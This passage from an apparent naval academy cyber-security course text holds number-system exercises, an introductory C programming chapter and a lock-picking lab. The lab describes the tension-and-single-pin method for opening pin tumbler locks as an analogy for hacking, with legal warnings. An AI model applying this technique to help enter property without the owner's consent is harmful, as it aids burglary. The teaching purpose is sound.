as a decimal number. Problem 10. Convert the binary number 10101 to decimal. Problem 11. Express the binary number 01110101 as a decimal number. Problem 12. Express the binary number 00101110 as a decimal number. Problem 13. Convert the decimal number 78 to binary. Problem 14. Convert the decimal number 43 to binary. Problem 15. Convert the decimal number 223 to binary. Problem 16. Express the hexadecimal number 27 as a decimal number. Problem 17. Express the hexadecimal number BEE as a decimal number. Problem 18. Convert the hexadecimal number 100 to binary. Problem 19. Convert the hexadecimal number F1E to binary. Problem 20. Convert the binary number 101110011011 to hexadecimal. Problem 21. Suppose you are told that an item is at 32-bit address C356A20C. What is the value of the fourth bit in this address, counting from the left? 15 Problem 23. Item A requires four bytes of storage and is located at address 0x00000071. Item B requires four bytes of storage and is located in memory right before (i.e., at a lower memory address than) Item A. Item C requires 2 bytes of memory and is located in memory right before item B. What is Item C's address? How is the letter k stored in memory in binary? Problem 24. How is the letter g stored in memory in hexadecimal notation? Problem 25. What is the hexadecimal number that results from the calculation: 0x138 + 0x6 Problem 26. What is the hexadecimal number that results from the calculation: 0x683 + 0x251 Problem 27. What is the hexadecimal number that results from the calculation: 0x2A6 + 0xE97 Problem 28. Consider the picture of main memory (RAM) shown below. The address of the first item is 0x0804839C, and addresses are numbered sequentially. Problem 22. (a) (b) (c) Problem 29. Labeling the figure showing the addresses for the next eight memory locations. List the four preceding memory addresses. If the items stored in the first five memory locations are characters, what is stored in this portion of memory? Consider the memory address 730 10 . By hand calculation, express this memory address in hexadecimal notation, using a number of hex digits appropriate for our 32-bit architecture. 16 Security Exercise 1 Part 1: Why Pick Locks in a Cyber Security Class? Many hacking conferences, such as the annual DEFCON Conference, have a room set aside for attendees to practice lock picking. If you think about it, hacking is a lot like lock picking! Hacking a computer is like solving a puzzle. Picking a lock is like solving a puzzle. Hacking potentially involves breaking into an area that you are not supposed to have access to. Picking a lock potentially involves breaking into an area that you are not supposed to have access to. Hacking a computer often involves exploiting a defect. Picking a lock often involves exploiting a defect. We don’t have to hack into a person’s computer to gain the desired outcome. We could, for instance, take the user hostage at gunpoint and force them to surrender their password. But, by surreptitiously hacking in, we can gain the desired outcome with the owner remaining unaware. 17 We don’t have to pick a lock to a person’s front door to gain the desired outcome; we could, for instance, kick in their front door. But, by surreptitiously picking the lock, we can gain the desired outcome with the owner remaining unaware. Learning to hack takes practice. You can’t learn hacking just from lecture—you have to get your hands dirty. Learning to pick locks takes practice. You can’t learn to pick locks just from lecture—you have to get your hands dirty. By learning to hack you can see how hackers defeat computer security mechanisms, and this can lead you to design more secure computer systems. By learning to pick a lock you can see how burglars defeat security mechanisms, and this can lead you to design more secure locks. If you decide to pursue lock picking as a hobby, note that some states do not even allow possession of lock picking tools. In the states of Mississippi, Nevada, Ohio and Virginia, simple possession of lock picking tools is taken as prima facie evidence that you intend to commit a crime. In every state, picking a lock without the lock-owner’s permission is a crime. In some countries it is illegal to even possess lock picking tools of the type you will use in lab today. For example, merely possessing lock picking tools in Japan carries a sentence of one year imprisonment. Likewise, in Australia and Poland, mere possession of lock picking tools is punishable with arrest. Hungary goes so far as to classify lock picks as military weapons and only the armed forces may possess them. In this lab, you will work in teams of four midshipmen to pick mechanical door locks. Part 2: The Pin Tumbler Lock Let’s examine this figure from The MIT Guide to Lock Picking 3: Hull Plug 3 Unless otherwise noted, all figures are from The MIT Guide to Lock Picking, Copyright 1991 by Theodore Tool. All rights reserved. The author permits reproduction of the document on a non-profit basis provided that this copyright and distribution notice is included. The information in The MIT Guide to Lock Picking is provided for educational purposes only. 18 This picture shows a pin tumbler lock with no key inserted. Note the primary components: The hull is stationary. The cylindrical plug can rotate when the correct key is inserted into the plug. The lock has pins. In the picture above, the lock has 5 pins. The pin closest to where the key goes in is labeled pin 1. The pins are in holes that pass through both the hull and the plug. Each individual pin has three components: A key pin A driver pin A spring The key pin and driver pin are distinct components, but they are forced tightly together by the spring. A protrusion on the plug (not shown) prevents the spring from pushing the pins completely out of the plug. Note that in the picture above (with no key inserted) the plug cannot rotate. The reason: The driver pins are protruding between the plug and hull, preventing rotation. The picture below more clearly shows the driver pin preventing rotation of the plug. When a key is inserted, the key pushes the key pin up, which pushes the driver pin up (working against the spring). If the key raises all the pins to precisely the point where the break between each key pin and driver pin is on the shear line, the plug will be free to rotate. This scenario is shown below. 19 Thus, the intent is to prevent the plug from moving unless the proper key is inserted. The proper key will lift each key pin to the point where the break between the key pin and driver pin lines up with the shear line between the plug and the hull. So… you might be seeing what is involved in lock picking… you have to use a tool to lift pins up so that breaks between the key pins and driver pins line up with the shear line between the plug and hull. And you might be wondering… How do we lift all those pins at the same time? The answer is: You don’t lift all the pins at the same time. You lift the pins one at a time! To pick a lock, you provide a small amount of force to attempt to turn the plug. The plug won’t turn of course, but the hope is that one of the drivers will be wedged between the plug and hull (with the other drivers still somewhat loose). In other words, the hope is that one pin will bind. 20 Then, you use a pick to gently move this driver up to the point where the gap between this particular key pin and driver pin lines up with the shear line between the plug and hull. At this point, the plug will rotate slightly, causing a different pin to be the one that is wedged between the plug and hull. So, to pick a lock, you: Apply a gentle force to turn the plug using a tension rod. Using a pick, try to determine which pin is binding. Gently and slowly push that pin up until you feel it reach the shear line. This will cause the plug to move slightly. We say that this pin is now set, with the driver pin trapped in the hull above the shear line. 21 Rinse and repeat A short video at the link below illustrates the idea (but keep in mind that the order that pins bind might not be as shown!): http://www.youtube.com/watch?v=v9hhBJHfwJE Note the critical flaw that makes lock picking possible: Due to limitations in manufacturing tolerances, only one pin at a time will bind! Part 3: Let’s Pick Locks We will use a Southord Locksmith Progressive Lock Picking System to learn how to pick locks. The kit comes with five locks, creatively given the numbers one through five. Lock number one is an exact replica of the lock to your Instructor’s residence. The lock has a single pin. The second lock, an exact replica of the lock to the EC310 Course Coordinator’s residence, has two pins. Therefore this lock is slightly more difficult to pick than lock one. Lock three, with three pins, is a replica of the lock to the Department Chair’s residence. Lock four (four pins) is a replica of the lock to the Dant’s residence and picking lock five (five pins) would mean you could gain access to (gasp!) the Buchanan House. Each kit comes with four different picks and one tension rod. It is recommended that you use just the “hook feeler pick” and the tension rod: 22 Hook Feeler Pick Tension Rod Your assignment: To complete this lab, you must show the ability to break into your Instructor’s residence and the EC310 Course Coordinator’s residence. To gain extra credit, you must break into the Department Chair’s residence. Show you instructor or lab technician your successful picking of each lock. __________ Lock 1 __________ Lock 2 __________ Lock 3 (Extra Credit) We would give you extra credit if you were to break into the Dant’s residence or the Buchanan House, but we realize that this far surpasses your meager abilities (hmm… sounds like a dare!). 23 24 Security Exercise 1 Answer Sheet Have your instructor sign for picking Locks 1, 2 and 3 below. __________ Lock 1 __________ Lock 2 __________ Lock 3 (Extra Credit) Although it exceeds your meager abilities, for "completeness", we include signature blocks for Locks 4 and 5. __________ Lock 4 (Mega Extra Credit) __________ Lock 5 (Super-duper bonus points) 25 26 Chapter 2: C Programs Objectives: a) b) c) d) Explain the distinction between machine language, assembly language and programs written in a high-level language. Demonstrate the ability to analyze simple C programs that perform keyboard input, screen output and simple arithmetic. Demonstrate the ability to create, edit, compile and execute C programs in a Linux environment. Explain how integers and characters are stored and encoded in memory. 1. Machine Languages and High Level Languages 1.1. Machine Language Computers can only “understand” ones and zeroes. Everything is bits! When introducing yourself, try this: “Hey, there are 10 kinds of people in the world, those that speak binary and those that don’t. Which are you?” Ha ha ha ha!!! Works every time! But…it gets worse! In addition to only speaking in ones and zeroes, computers can only interpret very simple instructions that have been “hardwired” as electronic circuits on the CPU chip. This set of simple hardwired instructions is termed the “instruction set,” and is established by the CPU manufacturer. Let’s examine something as simple as adding two integers together. Computers can add two integers together because there is an electronic circuit that works as follows: if you place a value on each of the two inputs to the circuit, the sum of the two values will be placed on the output of the circuit. You should accept that such a circuit is easy to build—some of your fellow midshipmen build these circuits in their classes, depending on their major. Let’s say we have this addition circuit sitting on a table in front of us. How do we get it to actually perform addition? Simply yelling at the circuit: “ADD TWO NUMBERS!” will not work (though many have tried). The solution, circa 1950: Run jumper cables! If we wanted to add an integer stored at a location (let’s call the location A) to a second integer stored at another location (let’s call this second location B), we would have to run cables from A and B to the first and second inputs of the addition circuit. If we wanted to store the resulting sum at location C, we would have to run a jumper cable from the output of the addition circuit to location C. From the dawn of computers (mid-1940’s) to the early 1950’s, programming a computer consisted of running frantically around a room, connecting and disconnecting cables from various locations on the large (room-size) computer for each calculation that had to be performed. This was arduous physical activity, and computer operation was very slow (but, on the bright side, computer programmers tended to be physically fit). Computers were slowed down by humans. The human operators might need five minutes to connect all the cables for a calculation that the circuit—once wired up—would then accomplish in five microseconds. So, the critical question arose: How can we “communicate” with the computer to instruct it to perform complex tasks while sitting at our desk? 27 Early Programmers Hard at Work on the ENIAC (US Army Research Lab) The solution: The circuit for each instruction in the CPU’s instruction set (for example, our addition circuit) is associated with a unique bit string that the CPU can interpret. For example, it may be the case that if this bit string is set to 00100011, our addition circuit will be used. If this bit string is set to a different value, say 11001000, the circuit that does a different instruction (perhaps the comparison circuit that determines if the first input is larger than the second input) will be invoked. Moreover, all of the required bit strings (needed to do whatever it was we needed to do) were placed in the computer's main memory at the outset. This stored set of instructions, a program, replaced the need for jumper cables. So, to write a program, the programmer must determine which operations from the instruction set he wishes the CPU to carry out, then determine the unique bit strings corresponding to these instructions. These instructions (i.e., this program) are then placed in memory, and the CPU executes one instruction after another. An example should clarify. Suppose we have again our two integers A and B and we want to calculate the sum as C = A + B. Using instructions from the CPU’s instruction set, the program to accomplish this might look something like Program 1, shown below on the left (with corresponding explanations shown on the right): Program 1 00010000 00000111 00100011 00001111 00010001 00000100 What it means to the computer load into the CPU the integer… …which we are calling A. Add to this… …what we are calling B Now place this result… …in the place we are calling C.4 This program is written in machine language, language that the computer can actually follow. Most early programs were written this way. Since machine language is defined by the hardware (the CPU’s instruction set), machine language is machinedependent. 1.2. Assembly Language (“Low Level Language”) Machine language programming was tedious, time-consuming, prone to error, cumbersome, and generally awful. Imagine having to write a program like Program 1 above just to add two integers. But, machine language programs are the only kind of programs that the CPU can understand. To make programming easier for humans, the machine instructions were replaced by “English-like” words, while decimal numbers and symbols replaced strings of bits. The new languages, using English-like wording, were called assembly languages. Using assembly language, if we wanted to perform, say, addition, then instead of using the code 00100011 which is the appropriate machine language code from our prior example, we would instead use the corresponding assembly language instruction ADD 4 The experienced programmer would recognize that the quantities A, B, C and D would actually be register values or the addresses of the variables. This simple example is not meant to be technically rigorous, and is certainly not intended to represent any actual machine language standard. 28 Program 1 on the previous page might appear as Program 2 below, written in assembly language. Program 2 LOAD A ADD B STORE C Computers don’t understand assembly language; computers only understand machine language. So, before a computer can execute an assembly language program, it must be converted to machine language. An assembler is the software that translates an assembly language program into a machine language program. Because of the nearly one-to-one correspondence between assembly language symbols and instructions in the instruction set, assembly language programs execute very efficiently. 1.3. High Level Languages Assembly language programming is still not enjoyable. For one thing, it takes time to write programs in assembly language because simple tasks take many lines of code. There is generally one assembly language symbol (e.g., “ADD”) for each instruction in the instruction set. Writing programs in assembly language is not fun, and if there is anything that electrical engineering is about, it’s having fun. High-level languages were developed to allow programmers to write programs that are closer to natural English. In a high level language, Program 1 on the prior page might simply be Program 3 C = A + B A single high-level language statement is usually equivalent to many, many instructions in the CPU instruction set (and therefore also equivalent to many, many assembly language instructions). A program written in a high-level language is called a source program (or source code). Again, since computers only understand machine language, a program written in a high-level language must be translated into machine language. A compiler is the software that translates high-level language into machine language. High level language program Compiler Machine language program All compilers convert high-level language programs to machine language programs, but, in addition, some compilers will also provide a listing of the assembly language code that corresponds to the machine language. This often proves very useful, as we shall see. 1.4. Program Development In this course you will gain some familiarity with the C high-level language. C works at a lower level (“closer” to the hardware) than do other languages, such as Java. With C, we can gain a finer control over what the computer is actually doing. The C language is approximately four decades old. In 1970, at AT&T’s Bell Labs, engineers Ken Thompson and Dennis Ritchie wanted to write an operating system to support a computer game they had written (Space Travel). They wanted to write the operating system in a high-level language (prior to this, operating systems were written in assembly language.) Finding no high-level languages satisfactory, they started with an existing language named BCPL as a base, and designed a new language, subsequently named B. The language was further improved and renamed C. This is the C language we have today. Having developed the C programming language, they returned to their task of writing an operating system in C. This operating system was UNIX. So, yes, the love that computer engineers have for video games led to the development of the C language and the UNIX operating system. Here is a screenshot from the game Space Travel, to give you an idea of what computer geeks were salivating over back in 1970: Now that we have discussed machine language and high-level languages, it is worthwhile to briefly cover the mechanics of using the C high-level language. You will enter your program by typing your C source code using a text editor (which—from a text entry point of view—you should find similar to using a program such as Notepad). As previously mentioned, you will 29 then send your program to a compiler, which will translate your program into the machine language that the computer can understand. You will then “run” (i.e., execute) your program. So…we have three basic steps: Edit, Compile, Execute. Your brains and hands Editor C program Machine language program Compiler Used to type in the program FINAL EXECUTABLE PROGRAM It should be emphasized once again: It is only the machine language program that is actually executed on the computer. 2. The Basics of C Why learn to program in C? Who uses C programs? You do! Here are some programs written in C (and its child, C++): MSWORD Acrobat Reader PowerPoint Firefox All Windows operating systems Most games In fact, despite what those CS kids might tell you, most programmers today are programming in C! The chart below shows the relative popularity of programming languages over the years. C and Java have been battling for the title of "#1 Programming Language" over the past years; C was the top language in 2013 and 2014; Java won the title (barely) in early 2015. C From TIOBE: The TIOBE Programming Community index is an indicator of the popularity of programming languages. The ratings are based on the number of skilled engineers world-wide, courses and third party vendors. It is quite fair for the busy midshipman to ask: "Why do I have to have basic familiarity with C programs?" The answer: The only way you can truly gain an appreciation for the damage that computer programs can do to your host computer is to learn a little computer programming. And since most programs are written in C (or its child C++), that’s a logical choice for us to pursue. To quote your textbook author: “An understanding of programming is a prerequisite to understanding how programs can be exploited.” 2.1. Program Layout Program Layout. Simple C programs have the following layout #include<stdio.h> int main( ) { our simple program } A complicated way of saying: "This is the start of the program." The closing brace says: “This is the end of the program.” Our simple program will consist of two parts: We first tell the computer the names of the variables we are going to use and the type of information they will hold. This part of the program is called the variable declarations. As we’ll see, we have to tell the C compiler about all the variables we intend to use in our program. 30 The second part tells the computer to do something with our variables. These individual instructions are called statements. So, our program layout can be further refined: #include <stdio.h> int main( ) { variable declarations statement 1; statement 2; (etc., etc.) statement n; } Spacing. We can use our own choice for line spacing and indentation. Specifically, we can have multiple blank lines between statements, we can indent each line as much as we like, we can place any amount of space between different words, etc. As a general rule, you should use line spacing and indentation to make programs easy to read. To enhance readability, place each statement on its own line (unless it won’t fit). The Semi-colon. Each statement is an instruction which is followed by the computer. Each executable statement is ended with a semi-colon. Put another way, a semi-colon marks the end of an executable statement. Syntax. The syntax of C is the set of rules for constructing correct statements. That is to say, the grammar rules of the programming language are referred to as the syntax. For example, ending each statement with a semi-colon is a grammar rule—part of the syntax. If we violate a grammar rule, it is said that we have made a syntax error. For example, if we don't include a semi-colon where necessary, or if we leave off a program’s closing brace, we have made a syntax error. The compiler will detect syntax errors. Comments. We can insert comments into programs in order to help other people (and ourselves!) understand the program. Comments are ignored by the compiler. No machine language is generated by comments. To insert a comment, use two consecutive slashes ( // ) with no space between them. The comment will begin immediately following the two slashes and run to the end of that line. Consider this example: #include <stdio.h> int main( ) { int length = 6, width = 5, height = 2; //Look at me! // Random comment, just thrown in to show you a comment. } 2.2. Variables A variable is a location in computer memory where data can be stored; that is, a variable holds data, for instance a number or a character. The data held in a variable is called its value. Identifiers. We give each variable a name. We can imagine that the memory location for our variable is actually labeled with the variable’s name. For example, if we have a variable named age that holds the value 50, we can "imagine" that in main memory my variable is held in a box labeled "age": age 50 Of course, in actuality, my variable is stored at a specific memory address (and is stored in binary). The programmer is free to choose the names of his variables subject to only a few constraints: A variable name must start with a letter. All other characters in the variable’s name must be letters, numbers or the underscore symbol. So, m171234 could be chosen as a variable name, but 171234 or m-171234 could not be variable names (in the first case, the faulty name starts with a number, in the second case the faulty name has a hyphen as one of its characters). Variable Declarations. Every variable must be declared before it can be used. When you declare a variable, you tell the computer the variable’s name (i.e., its identifier), and what kind of data you are storing in the variable. The compiler reserves a location in memory to hold the variable’s value. The kind of data that a variable holds is called the variable’s type. More on this in a moment, but, first, the syntax of a variable declaration is: type variable_name_1, variable_name_2, ... , variable_name_x ; 31 Note that when you declare more than one variable of the same type in a declaration, a comma is used to separate the variable names. Also notice that a variable declaration ends with a semicolon. Variable Types When you declare a variable, you must tell the computer the variable's type, i.e., the kind of data the variable will be holding. For now, our choices for type are: Kind of data type Integer (e.g., 1, -5, 39) Real Numbers (e.g., 2.35, -9.9) A single character (e.g., A, $, b) Amount of space reserved to hold the variable int float char stored in 4 bytes stored in 4 bytes stored in 1 byte Notice that integers are always stored as four bytes. So, for example, the integer value 2 is represented in binary as 10 and would be stored as the four-byte quantity: 00000000 00000000 00000000 00000010 Examples of Declarations. If we wanted to declare a variable that would hold someone's age as an integer, we would use int someone_age; If we wanted to declare two variables that would store a midshipman's status as a single character (e.g., P for Plebe, Y for Youngster, S for Sleeper, F for Firstie), we would use char mid1, mid2 ; Why do we need to declare variables? Consider the following series of 1’s and 0’s stored in memory: 01000001. This set of 1’s and 0’s can be The character A in ASCII the integer 65 (under the presumption that the three preceding bytes are all zeros since integers use four bytes) some real number Which is it? There is no way of knowing, unless we tell the compiler up-front the type of data the variable is intended to hold. If we tell the compiler the aforementioned value (01000001) is the value of variable of type char, the compiler will interpret the value as the character A. If, on the other hand, we specify that this is the value of a variable of type int, the compiler will interpret the value as the integer 65. By declaring a variable we tell the computer how much memory to use for the variable and what code to use when converting the variable’s value to and from a binary string. 2.3 Data Representation. Positive integers are stored in four bytes by converting the integer to a binary number. The right most 31 bits are used. The leftmost bit is set to zero (indicating a positive number). We will not be concerned with negative integers in this course, but you should be aware that they are also stored in four bytes and the left-most bit will be a one. Variables of type char are stored in one byte using the ASCII code. The ASCII table from previous chapter is repeated below. 32 2.4 Initializing Variables. All variables always have some value. When we first declare a variable, it will have a value determined by whatever pattern of ones and zeroes were left in that memory location by the previous program. For our purposes, this value is a garbage value. To avoid inadvertently using garbage values in a program, it is often advisable to initialize variables when they are declared. The syntax is: type variable_name = value ; Some examples of variable declarations in which the variable is initialized in the declaration are: int answer = 0; float weight = 350 ; Practice Problem 2.1 What data type would be optimal to store the following classes of data? (a) (b) (c) (d) The number of jellybeans in a jar The cost of a Snickers bar The circumference of a lollipop The individual letters in the word "skittles" Solution: (a) (b) (c) (d) 33 Practice Problem 2.2 How many total bytes would be needed to store the following variables? int tacos, chimichangas; int nachos = 14; float pico, de, gallo; char tortilla, guacamole; float burritos = 2; Solution: 2.5. The Assignment Statement. The direct way to change the value of a variable is by use of the assignment statement. The assignment statement has the form: variable = expression; where the expression on the right can be: a literal (i.e., a number such as 5, or a character such as the dollar sign) another variable a more complicated expression made up of literals, variables and mathematical operators Some examples of assignment statements are: int answer, solution; answer = 10; solution = answer; answer = solution + 10; // Now solution equals 10 // Now answer equals 20 It is important that you understand how an assignment statement works. In an assignment statement, the value of the expression on the right hand side of the equal sign is first computed, and then the variable on the left hand side of the equal sign is changed to this value. For example, the statement: area2 = area2 +10; would make no sense as an algebraic equation, but in C this statement means: “Make the new value of area2 equal to the old value of area2 plus ten.” It is important to note that the equals sign is the assignment operator. A note about char variables. Variables of type char hold single characters such as a, b,…z, A, B,…0, 1,…9, !, #, @. It is important to note that a character literal is enclosed in single quotes. For example, to declare a variable that will be used to store marital status (M for married, S for single), we might use: char marital_status; marital_status = 'M'; Of course the two previous lines of C code could have been combined into one declaration as char marital_status = 'M'; 2.6. Mixing Types Generally, you should not store a value of one type in a variable of another type. The biggest problem occurs when storing a real number in an integer variable. When we store a real number in an integer variable, the portion after the decimal is truncated (not rounded). Practice Problem 2.3 Consider the two lines of C code: int a; a = 0.9999; If we were to now print out the value of the variable a, what value would we see? Solution: Of course every rule has its exception. Concerning “mixing types,” it is acceptable to assign integers to variables of type float. The following code would be perfectly fine: float speed; speed = 55; // sets speed = 55.0 34 3. Simple Output 3.1. The printf statement To output data from our program to the screen (i.e., the monitor) we use a printf statement. Think of printf as being another name for the monitor. By using printf we can send to the screen: values of variables arithmetic expressions strings of text printf syntax for character strings. The syntax for printing a string of characters is printf( " the stuff I want printed " ) ; Note the quotation marks When we want to output a text string, we place the string in quotes. The text string appears exactly as typed, except the quotes are not printed on the screen. For example, the line of C code printf( "To be a mid or not to be." ); will output to the monitor: To be a mid or not to be. 3.2. A Note on Spacing. The computer will not insert spaces before or after the items that are output using printf. A new printf will start printing to the screen exactly where the last printf left off. We often begin and end strings with blanks to keep the output from running together. Practice Problem 2.4 What is the output produced by these two lines of C code: printf("Go Navy!"); printf("Beat Army!"); Solution: 3.3. Output Escape Sequences. Since a new printf statement begins where the last printf statement left off, output will run along one line. To get a new line, we use: "\n" (i.e., \n inside quotes). The sequence \n is called an escape sequence. The backslash tells the compiler to escape the normal meaning of the next character, and apply an alternate meaning. In this case, "\n" tells the compiler to advance the cursor to the next line on the screen. Other escape sequences: \t \\ \" \' tab print a backslash print a double quote symbol print a single quote symbol Practice Problem 2.5 What is produced by each of these code snippets? (a) printf("Go Navy\n"); printf("Beat Army\n"); (b) printf("Go Navy\nBeat Army\n"); (c) printf("Go Navy\tBeat Army\n"); printf("\"Go Navy\nBeat Army\"\n"); printf("A\\B\n"); Solution: (a) (b) (c) 35 3.4. printf with conversion specifiers Conversion Specifiers. Next, we discuss the printf syntax for printing numbers and characters within strings. What was previously termed a character string is now termed a control string, since it will also contain information which controls how variables will appear. We must specify the format of the numbers and/or characters with conversion specifiers which describe the format to be used in printing the corresponding variables. The order of the conversions specifiers is matched to the order of the variables that appear after the control string. The conversion specifiers are: %d %f %c %s for an integer for a floating point for a character for a string The use of conversion specifiers is best illustrated with an example. Practice Problem 2.6 Explain what is printed out by the following line of C code: int number = 3050; float gpa_low = 3.13 , gpa_high = 3.95; printf("%d midshipmen have a GPA between %f and %f\n", number, gpa_low, gpa_high); Solution: Conversion Specifiers with Simple Strings. We mentioned that we can print a string of characters without using conversion specifiers. For example, we could print the phrase Go Navy! by using the statement: printf("Go Navy!"); We could, just as well, have used a conversion specifier to print out this string of characters, as in: printf( "%s" , "Go Navy!" ); It may cause fewer errors to consistently use format specifiers, even for simple character strings. Practice Problem 2.7 Determine the error in the complete C program shown below: #include <stdio.h> int main() { int apples = 42; printf("There are %c apples in my barrel\n", apples); } Solution: 4. Simple input with the scanf statement 4.1 The scanf statemet. The scanf statement is used for inputting data to the program from the keyboard. Think of scanf as being another name for the keyboard. The scanf statement, like the printf statement, uses a control string followed by the memory locations of the variables to receive the values typed in at the keyboard. Best to go to an example! To read an item from the keyboard and place the value into a variable named year_number of type int, we use: int year_number; scanf("%d" , &year_number); The first part following the parenthesis—%d—is the conversion specifier. The %d indicates that the item that we will type in at the keyboard is intended to be an integer. As before, we use the conversion specifiers: 36 %d %f %c %s for integer for floating point for character for a string The second part of the scanf statement—&year_number—indicates that the integer typed in at the keyboard should be placed in the variable named year_number. It is a very common error to omit the & in scanf statements. 5 You should understand how the scanf statement works. When the computer sees a scanf statement, it stops and waits for input to be entered from the keyboard. The program does not read the input until the user hits the ENTER key. (This allows the user to backspace and correct mistakes). Pressing the ENTER key makes the data that we type available for the program. When we press ENTER, what we typed in is assigned as the variable’s value, and the computer then resumes operation. Before reading something from the keyboard, it is always a good idea to prompt the user to enter the value using a printf statement. Practice Problem 2.8 What is the output produced by this complete C program: #include<stdio.h> int main() { int year_number; printf("Enter the year: ") ; scanf("%d" , &year_number); printf("\nThe year is %d \n" } , year_number); Solution: You can enter multiple values using a single scanf statement. This is illustrated in the practice problem below. Practice Problem 2.9 What is the output produced by this complete C program: #include<stdio.h> int main() { int year, month; printf("Enter the year and the month (1-12): ") ; scanf("%d %d" , &year , &month); printf("\nIt is now %d / %d \n" , month , year); } Solution: Note that values entered via the keyboard must be separated by at least one blank. The first value entered at the keyboard is stored in year and the second in month. When the computer reads in data with scanf, it ignores spaces, tabs and returns (other than using the return as a signal from the user that data has been entered). The ampersand that precedes the variable year_number is the address operator. We’ll talk more about this later. For now, just remember that with the scanf statement you want to ensure you include an ampersand before each variable name of type int, float and char. 5 37 Practice Problem 2.10 Add one line to the C program shown below (at the point indicated) so that the output shown below is produced when the user enters 3.5 when prompted. #include<stdio.h> int main( ) { float number; printf("Enter a number and I will multiply it by 2: "); scanf( "%f" , &number ); // Enter one line of code here! printf("Twice the value you entered is: %f \n" , number ); } Desired output: Enter a number and I will multiply it by 2: 3.5 Twice the value you entered is: 7.000000 Solution: Practice Problem 2.11 Match the term on the left with its appropriate description on the right: printf instruction set (a) (b) the C programming language the C assignment operator scanf machine language compiler assembler high-level language assembly language (c) (d) (e) (f) (g) (h) translates assembly language into machine language the conversion specifier for an integer value allows the program to receive keyboard input the C escape sequence for a new line instructions expressed as bits program that converts source code to machine language %d (i) all of the simple instructions hard-wired on a CPU = (j) used to display text to the monitor \n (k) English-like words that represent machine code Solution: 5. Program Errors A program error is termed a bug. The process of finding and eliminating program errors is called debugging. There are three different types of program errors. Syntax errors These are violations of the C grammar rules. These errors are caught by the compiler. Run-time errors (also called execution-time errors). These are errors that are detected as the program is running. These errors usually entail an attempt to perform an illegal operation, and usually cause the program to crash. Logic errors – these errors are the hardest to find! The program is grammatically correct and executes without errors, but does not do what we want it to do. As an example, suppose we calculate the average of two float values a and b and assign the result to a float variable named average by using: average = a + b /2.0 ; Since C evaluates division before addition, the statement above will be understood by the C compiler as: average = a + (b /2.0) ; which is, of course, not what we intend! 6 6 The correct line of C code to perform the average would be: average = (a + b) /2.0 ; 38 To avoid logic errors, you should “trace-through” your program on paper to make sure the logic is correct. When you trace through the program, you should consider various input possibilities. Statistics show that greater than 50% of a programmer’s time is spent on debugging. For your reading and viewing pleasure, here are some examples of software errors that led to disasters of one type or another. These will not be reviewed in class: View/read on your own time if interested. Runtime error: Logic error: http://www.wired.com/science/discoveries/news/1998/07/13987 http://en.wikipedia.org/wiki/Mars_Climate_Orbiter 39 40 Reading Read Appendix 2, titled "The Linux File System". Problems 1. Write a complete C program that prompts the user to enter his initials. The program should then provide the following output message EXACTLY as shown below (where, in this illustration, the user entered his initials as P and V): Please enter your initials: PV Thank you PV for using the program. Turn in a copy of your source code and a screen capture of your program successfully running. For example, my source code is shown below: 2. Write a complete C program for converting temperature values from degrees Fahrenheit to degrees Celsius. The program should prompt the user to enter a temperature in units of degrees Fahrenheit. The program outputs the temperature in degrees Celsius. If T f is the temperature in degrees Fahrenheit, the temperature in degree Celsius, TC , is given by TC 5 Tf 32 9 You should declare the two temperatures to be of type float. Turn in a copy of your source code and a screen capture of your program successfully running. For example, my source code is shown below: 3. Start at your command prompt for the EC310 VM: midshipman@EC310:~ $ (a) Determine how many users have accounts on your Linux system? What are their names? (b) How many items (directories and files) are immediately under the root directory? 4. How many total bytes would be needed to store the following variables? int time_1, time_2, time_3; float PRT1 = 9.5, PRT2 = 8.7; char mid_1, mid_2; 5. Determine the error contained in the program shown below. 1 2 3 4 5 6 6. #include <stdio.h> int main() { int favoriteNumber = 2017; printf("My number is %d\n", favorite_Number); } Consider the Linux file system shown below. 41 (a) (b) (c) (d) 7. What is the absolute pathname for the directory bob? What is the absolute pathname for the file lesson5? If your working directory is joe, what is the relative pathname for the file lesson5? If your working directory is dane, what is the relative pathname of the root directory? For each of the following questions select the answer that best identifies the type of computing code being described from the choices high-level code assembly code machine code honor code (a) Code resulting from a successful compilation of a C program's source code. (b) Code used when we write programs in the C programming language. (c) This code uses English-like mnemonics which correspond to machine instructions. 8. You and your friend have been tasked to write a C program that prompts the user to enter his initials. The program should then print to the monitor the user's initials. For example, here is how a run of the program should look: Your friend has written the program shown below, but her program contains an error. (Note that the numbers shown on the far left are line numbers shown for convenience… these are not part of the program.) 1 2 3 4 5 6 7 8 9 #include <stdio.h> int main( ) { char init1, init2; printf("Please enter your initials: "); scanf("%c %c", &init1, &init2); printf("Thank you %c%c for using the program\n", init2, init1); } (a) Determine the error. Note: Splitting a printf statement across two lines (as shown on lines 7-8) does not cause any problems. (b) What type of error is this (syntax, runtime or logical)? 42 Security Exercise 2 Part 0: Ground Rules Do not attempt to physically alter any equipment in the lab, aside from your own laptop. Once your instructor has verified that you have completed all portions of the security exercise, you may turn in your completed security exercise answer sheet (the last page, where you place your answers). It is at your instructor's discretion wether you may leave early. While each student must be doing the security exercise on his own PC, you are free to consult and confer with friends who are nearby. Learning from your friends is encouraged! Safety tip: You must be doing the security exercise during the lab session. You will have 1 point deducted from your final course grade for each time your instructor catches you surfing the web, checking your email, or doing anything other than the security exercise. Don’t do it! Part 1: Starting Point Start VMware Workstation. Click "Power on this virtual machine", which should be the virtual machine you loaded on the first day of class. 43 You should see something similar to this mysterious screen: So, our plan today is to run C programs in a Linux environment using VMware. To which you are probably saying: Who am I? Why am I here? Don’t worry! It’ll be fun!!! We said that our goal is to “Run C programs in a Linux environment using VMware.” This likely raises three questions in your mind: What is this mysterious thing that you are calling “VMware”? As a related question: Do I have to come to class, or can I attend virtually? Linux is not Windows… and therefore I fear it. Why are you making me use this exotic operating system? How do I run C programs? And what is for dinner in King Hall today? 44 We’ll answer each of these questions in turn. So, first: What is VMware? VMware allows you to “play” other operating systems on your Windows computer. It used to be the case (about ten years ago) that if I wanted to have, say, a Windows computer, an Apple computer and a Linux computer, I would have had to buy three separate computers: a Windows computer, an Apple computer and a Linux computer. More recently (about seven years ago), dual-booting became more prevalent. In this case, I could run Windows and Linux on the same computer, but I had to choose which operating system I wanted to run—i.e., as soon as the computer was turned on, I would be prompted to make a choice, and then I had to stick with that. If I was running Linux but then wished to switch to Windows, I would have to restart the computer and then, when prompted, state that I wanted the computer to run as a Windows machine. Then, along came VMware. VMware allows us to “play” another operating system as though it were just another application. Just as I can have a window open with a PowerPoint application running, and a window open with a Firefox application running, I can— using VMware—have a window open with the Linux operating system running. So, shown below is a snapshot of my computer screen (obviously, your background and icons will be far less interesting). Note that I am using Windows 7 as my operating system, but the VMware window that I have open is running a Linux 